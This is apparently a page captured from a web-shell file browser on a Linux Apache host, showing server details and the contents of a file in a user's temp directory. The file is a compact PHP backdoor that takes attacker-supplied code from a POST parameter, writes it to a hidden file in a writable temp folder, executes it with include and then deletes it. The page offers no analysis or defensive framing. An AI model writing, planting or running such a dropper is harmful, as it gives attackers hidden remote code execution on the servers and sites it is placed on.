HEX
Server: Apache
System: Linux smartwebfx.com 5.4.0-211-generic #231-Ubuntu SMP Tue Mar 11 17:06:58 UTC 2025 x86_64
User: fastshipsa (1010)
PHP: 8.3.20
Disabled: NONE
Upload Files
File: /home/fastshipsa/tmp/8496b153i6wnVU
<?php $dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c=rawurldecode($_POST["aP"]);foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.parle_tokens";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");